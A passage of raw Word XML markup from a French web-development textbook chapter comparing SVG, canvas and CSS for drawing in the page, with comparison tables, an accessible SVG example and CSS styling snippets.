          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Choisir le bon outil pour dessiner dans la page, sans sacrifier l'accessibilité ni la performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 41</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Distinguer SVG, canvas et CSS pour le dessin.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Écrire un SVG lisible et accessible.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Animer un SVG sans JavaScript.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Dessiner sur un canvas avec un facteur d'échelle.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Choisir l'outil adapté à un besoin de visualisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>42.1 Trois façons de dessiner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur propose trois modèles très différents : des éléments vectoriels dans le DOM (SVG), une surface de pixels pilotée par script (canvas), et des formes décoratives décrites en CSS. Chacun a un coût et un usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.139 — Six critères de choix</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208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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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SVG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Canvas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2089"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DOM vectoriel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bitmap impératif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boîtes stylées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Événements par forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Calcul manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Sur les éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2089"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Possible et fine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très limitée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bonne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Milliers d'objets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Coûteux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Adapté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2089"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépend de la résolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2309"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nette</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Animation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Déclarative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Boucle de rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="230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Déclarative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CANVAS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Surface bitmap dessinée par instructions JavaScript. Le contenu n'existe pas dans le DOM : il n'est ni sélectionnable, ni indexable, ni lisible par un lecteur d'écran.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2921000"/>
            <wp:docPr id="53" name="Picture 53"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f51.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2921000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.51 — Quel outil pour quel besoin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>42.2 Écrire du SVG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un SVG est un document XML : chaque forme est un élément, stylable en CSS et manipulable en JavaScript. Il s'intègre en ligne, en image ou en fichier référencé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un SVG accessible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&lt;svg viewBox="0 0 120 80" role="img" aria-labelledby="titre-schema"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title id="titre-schema"&gt;Répartition du trafic par zone&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;desc&gt;Deux rectangles proportionnels : 70 % en Europe, 30 % en Afrique.&lt;/desc&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rect x="0"  y="0" width="84" height="40" rx="4" fill="#0F2E4C" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rect x="0"  y="44" width="36" height="40" rx="4" fill="#E0A21B" /&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;text x="8" y="24" fill="#FFFFFF" font-size="11"&gt;Europe 70 %&lt;/text&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;text x="8" y="68" fill="#0F2E4C" font-size="11"&gt;Afrique 30 %&lt;/text&gt;</w:t>
        <w:br/>
        <w:t>&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.140 — Cinq éléments clés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04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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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291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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>viewBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système de coordonnées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Indispensable pour l'échelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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&lt;title&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Nom accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Lu par les lecteurs d'écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;desc&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Description longue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Complète le titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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role="img"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Rôle explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Évite une lecture XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>preserveAspectRatio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comportement au redimensionnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par défaut, centré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un SVG stylé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Le SVG se style comme le reste de la page */</w:t>
        <w:br/>
        <w:t>.schema { max-inline-size: 100%; block-size: auto; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>.schema .zone-europe  { fill: var(--navy); }</w:t>
        <w:br/>
        <w:t>.schema .zone-afrique { fill: var(--amber); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Les propriétés de forme se surchargent en CSS */</w:t>
        <w:br/>
        <w:t>.schema rect { transition: fill 200ms ease; }</w:t>
        <w:br/>
        <w:t>.schema rect:hover { fill: var(--navy-light); }</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`WIDTH` ET `HEIGHT` SANS `VIEWBOX` EMPÊCHENT LA MISE À L'ÉCHELLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un SVG fixé à 300 × 200 pixels sera flou ou rogné sur mobile. Déclarez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>viewBox</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et laissez la taille venir du CSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
